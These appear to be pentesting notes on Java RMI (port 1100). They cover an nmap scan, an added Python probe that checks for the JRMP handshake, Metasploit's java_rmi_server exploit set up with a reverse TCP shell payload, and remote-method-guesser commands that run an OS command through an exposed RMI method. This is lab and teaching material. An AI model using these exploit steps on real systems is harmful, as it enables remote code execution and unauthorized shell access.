1100 - Pentesting mssql rmi java

RMI (Remote Method Invocation) is a Java API that lets a Java application invoke methods on objects running in a remote JVM (Java Virtual Machine). It provides a mechanism for building distributed Java applications, in which objects on different JVMs interact with each other.

nmap

nmap -p 1100 -Pn -sC -sV $IP
1100/tcp  open  java-rmi     Java RMI
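
The `java-rmi` label in that output rests on the JRMP handshake that every RMI endpoint answers. The following is an added example, not part of the original page: it builds the client greeting and parses the server reply, so you can confirm which listeners on your own hosts speak RMI and should be firewalled or bound to loopback. The wire constants come from the Java RMI wire protocol specification; the sample reply bytes and addresses are constructed.

```python
import socket
import struct

JRMI_MAGIC = b"JRMI"            # 0x4a524d49, opens every JRMP stream
JRMP_VERSION = 2
STREAM_PROTOCOL = 0x4B          # client asks for StreamProtocol
PROTOCOL_ACK = 0x4E             # server accepts
PROTOCOL_NOT_SUPPORTED = 0x4F   # server speaks JRMP but refuses this sub-protocol


def client_hello() -> bytes:
    """Greeting: magic, 2-byte version, 1-byte protocol selector."""
    return JRMI_MAGIC + struct.pack(">HB", JRMP_VERSION, STREAM_PROTOCOL)


def parse_server_reply(data: bytes) -> dict:
    """Classify the first bytes a server sends back after client_hello()."""
    if not data:
        return {"jrmp": False, "reason": "empty reply"}
    if data[0] == PROTOCOL_NOT_SUPPORTED:
        return {"jrmp": True, "ack": False, "reason": "protocol not supported"}
    if data[0] != PROTOCOL_ACK:
        return {"jrmp": False, "reason": "unexpected first byte 0x%02x" % data[0]}
    if len(data) < 3:
        return {"jrmp": True, "ack": True, "reason": "truncated endpoint"}
    # ProtocolAck is followed by the client's endpoint as the server sees it:
    # a UTF string (2-byte length + bytes) and a 4-byte port.
    (host_len,) = struct.unpack_from(">H", data, 1)
    end = 3 + host_len
    if len(data) < end + 4:
        return {"jrmp": True, "ack": True, "reason": "truncated endpoint"}
    host = data[3:end].decode("utf-8", "replace")
    (port,) = struct.unpack_from(">i", data, end)
    return {"jrmp": True, "ack": True, "seen_host": host, "seen_port": port}


def probe(host: str, port: int, timeout: float = 3.0) -> dict:
    """Send the greeting to a host you administer and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(client_hello())
        return parse_server_reply(s.recv(512))


if __name__ == "__main__":
    # Constructed reply: ack, then the endpoint "10.0.2.15":51234.
    sample = b"\x4e" + struct.pack(">H", 9) + b"10.0.2.15" + struct.pack(">i", 51234)
    print(parse_server_reply(sample))
    print(parse_server_reply(b"HTTP/1.1 400 Bad Request\r\n"))
```

The endpoint echoed in the ack is the client's address as seen by the server, which also reveals whether a NAT or proxy sits between the two.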

metasploit

use exploit/multi/misc/java_rmi_server
show payloads
set payload payload/generic/shell_reverse_tcp
set RHOSTS 10.0.2.8

remote method guesser

wget https://github.com/qtc-de/remote-method-guesser/releases/download/v4.3.1/rmg-4.3.1-jar-with-dependencies.jar -O /opt/tools/rmg.jar
java -jar /opt/tools/rmg.jar enum $IP 1100
java -jar /opt/tools/rmg.jar call $IP 1100 '"ping -c 10 192.168.119.199"' --signature 'String execute(String cmd)' --bound-name plain-server